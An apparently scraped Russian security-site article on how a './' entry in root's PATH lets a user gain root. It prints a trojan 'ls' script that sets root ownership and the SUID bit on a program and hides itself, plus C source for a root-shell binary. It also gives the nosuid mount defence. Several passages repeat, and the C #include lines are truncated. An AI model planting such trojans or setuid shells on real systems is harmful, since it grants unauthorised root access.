SecuRRity.Ru » Статьи » Получение привилегированных прав доступа к системе
Получение привилегированных прав доступа к системе
автор: Administrator | 5 февраля 2009, 15:34 | Просмотров: 5925теги: Статьи, include, скрипт, программа, администратор, умолчанию
Многие администраторы испытывают неудобство при переходе от Win систем на юникс системы, из-за того, что по умолчанию не возможен запуск программ из текущего каталога, это требуется явно указать. Для решения такой проблемы они просто явно прописывают путь по умолчанию в переменную PATH.
Для решения такой проблемы они просто явно прописывают путь по умолчанию в переменную PATH.
Допустим:
PATH=./:/bin:/usr/bin:/sbin
Такой глупостью может воспользоваться практически любой пользователь системы.
Предположим пользователь пишет такой скрипт:
И называет его ls.
этот скрипт при старте устанавливает владельцем root'a на программку a.out и бит SUID на нее.
И последняя строка выводит как бы обычный результат работы программы ls исключая саму себя из общего списка.
Програмка a.out запускает шелл с правами root, ее исходный код:
Во избежание таких эксцессов домашние каталоги пользователей ВСЕГДА должны находится на ОТДЕЛЬНОМ РАЗДЕЛЕ !!! который будет смонтирован с опцией nosuid.
Пример:
Допустим в системе существует винчестер hdc, смонтируем его при старте системы с флагом nosuid
/dev/hdc1 /home ext3 defaults,nosuid 1 1
Еще раз про способ организации:
Для решения такой проблемы они просто явно прописывают путь по умолчанию в переменную PATH.
Допустим:
PATH=./:/bin:/usr/bin:/sbin
Такой глупостью может воспользоваться практически любой пользователь системы.
Предположим пользователь пишет такой скрипт:
#!/bin/bash
chown root:root /home/petr/.mc/a.out
chmod 4755 /home/petr/.mc/a.out
/bin/ls $1 $2 $3 $4 $5 $6 $7 | grep -v ls
chown root:root /home/petr/.mc/a.out
chmod 4755 /home/petr/.mc/a.out
/bin/ls $1 $2 $3 $4 $5 $6 $7 | grep -v ls
И называет его ls.
этот скрипт при старте устанавливает владельцем root'a на программку a.out и бит SUID на нее.
И последняя строка выводит как бы обычный результат работы программы ls исключая саму себя из общего списка.
Програмка a.out запускает шелл с правами root, ее исходный код:
#include
#include
#include
#include
int main(int argc, char ** argv)
{
setgid(0);
setuid(0);
execl(_PATH_BSHELL, _PATH_BSHELL, NULL);
}
#include
#include
#include
int main(int argc, char ** argv)
{
setgid(0);
setuid(0);
execl(_PATH_BSHELL, _PATH_BSHELL, NULL);
}
Во избежание таких эксцессов домашние каталоги пользователей ВСЕГДА должны находится на ОТДЕЛЬНОМ РАЗДЕЛЕ !!! который будет смонтирован с опцией nosuid.
Пример:
Допустим в системе существует винчестер hdc, смонтируем его при старте системы с флагом nosuid
/dev/hdc1 /home ext3 defaults,nosuid 1 1
Еще раз про способ организации:
- Создаем скрипт с названием аналогичным ls который будет по функциональности ничем не отличатся от обычной программы ls, но будет проделывать ряд действий:
- устанавливать владельца root на какую-нибудь программу, которая находится в домашнем каталоге пользователя;
- устанавливать бит SUID на эту программу. ЧТО ПОЗВОЛИТ В ДАЛЬНЕЙШЕМ пользователю запустить данную программу с правами владельца, т.е. получить привилегированный доступ к системы.
- устанавливать владельца root на какую-нибудь программу, которая находится в домашнем каталоге пользователя;
- Производим написание (НЕВАЖНО НА КАКОМ ЯЗЫКЕ программирования) программы над которой будут производится вышеописанные действия. В лучшем случае эта программа должна запустить командный интерпритатор с правами root.
- Выводим содержимое текущего каталога на экран - как будто это исполнилась программа ls.
Автор:
Буренин Владимир
Буренин Владимир
Информация
Посетители, находящиеся в группе Гости, не могут оставлять комментарии к данной публикации.
Панель управления
Настройки страницы
помощь: С помощью данных кнопок Вы можете изменить расположение информационных блоков по горизонтали, а также настраивать яркость и размер шрифта.
Для этого, в Вашем браузере должен быть включён JavaScript и браузер должен принимать файлы cookie нашего домена.
Все изменения автоматически сохраняются в cookie-файле Вашего браузера в течение 365 дней со дня изменений настроек.
Подписка на сайт
Календарь
Пн | Вт | Ср | Чт | Пт | Сб | Вс |
---|---|---|---|---|---|---|
Популярные новости
Облако тегов
Microsoft Windows Антивирус Атака БРАУЗЕР Безопасность ВРЕДОНОСНЫЕ Вредоносные программы ДАННЫЕ ЗАЩИТА ИНФОРМАЦИЯ Интернет КОМПЬЮТЕР НОВОСТИ ПО ПРОГРАММА САЙТ СТАТЬИ США Система Софт ТРОЯН Термины УЯЗВИМОСТИ Уязвимые сайты ФАЙЛ Хакер ЧЕРВЬ безопасности взлом вирус доступ злоумышленник программы сайты сервер спам уязвимость файлы хакеры
Последние комментарии
» Написал: Павел
в новости: Бесплатный ключ для ESET Smart Security 5 на 6 месяцев
» Написал: Катерина
в новости: Бесплатный ключ для ESET Smart Security 5 на 6 месяцев
» Написал: Administrator
в новости: K9 Web Protection: бесплатный родительский контроль
» Написал: Елена
в новости: K9 Web Protection: бесплатный родительский контроль
» Написал: kholod
в новости: Бесплатный ключ на 1 год для IObit Malware Fighter PRO
» Написал: Серега из Стрежевого
в новости: Бесплатный ключ на 1 год для Comodo Internet Security Pro 2012
» Написал: Akex
в новости: Бесплатный ключ на 1 год для IObit Malware Fighter PRO
в новости: Бесплатный ключ для ESET Smart Security 5 на 6 месяцев
» Написал: Катерина
в новости: Бесплатный ключ для ESET Smart Security 5 на 6 месяцев
» Написал: Administrator
в новости: K9 Web Protection: бесплатный родительский контроль
» Написал: Елена
в новости: K9 Web Protection: бесплатный родительский контроль
» Написал: kholod
в новости: Бесплатный ключ на 1 год для IObit Malware Fighter PRO
» Написал: Серега из Стрежевого
в новости: Бесплатный ключ на 1 год для Comodo Internet Security Pro 2012
» Написал: Akex
в новости: Бесплатный ключ на 1 год для IObit Malware Fighter PRO
Участник рейтингов
На правах рекламы
http://ts-fasad.ru/ устройство наливного пола в Орле.